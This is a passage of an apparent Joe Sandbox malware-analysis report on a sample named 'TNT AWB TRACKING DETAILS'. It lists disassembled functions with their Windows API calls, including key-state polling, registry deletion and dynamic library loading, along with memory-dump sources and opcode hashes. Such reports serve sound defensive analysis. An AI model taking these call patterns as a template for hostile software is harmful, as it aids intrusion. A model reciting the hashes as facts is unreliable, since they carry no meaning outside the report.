                                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                      Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$_memmove_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1589278365-1403004172
                                      • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                      • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                      • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                      • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                      Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Handle
                                      • String ID: nul
                                      • API String ID: 2519475695-2873401336
                                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                      Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Handle
                                      • String ID: nul
                                      • API String ID: 2519475695-2873401336
                                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                      Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: SysAnimate32
                                      • API String ID: 0-1011021900
                                      • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                      • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                      • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                      • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                      Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                      • GetFocus.USER32 ref: 0046157B
                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                      • __swprintf.LIBCMT ref: 00461608
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                      • String ID: %s%d
                                      • API String ID: 2645982514-1110647743
                                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                      Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                      Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                      • String ID:
                                      • API String ID: 3488606520-0
                                      • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                      • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                      Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                      Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$FreeLoad
                                      • String ID:
                                      • API String ID: 2449869053-0
                                      • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                      • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                      Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004563A6
                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                      • String ID:
                                      • API String ID: 3539004672-0
                                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                      Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                      • String ID:
                                      • API String ID: 327565842-0
                                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                      Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                      • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                      Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Enum$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 2095303065-0
                                      • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                      • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                      • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                      • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                      Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00436A24
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: RectWindow
                                      • String ID:
                                      • API String ID: 861336768-0
                                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                      Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32 ref: 00449598
                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                      • _wcslen.LIBCMT ref: 0044960D
                                      • _wcslen.LIBCMT ref: 0044961A
                                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
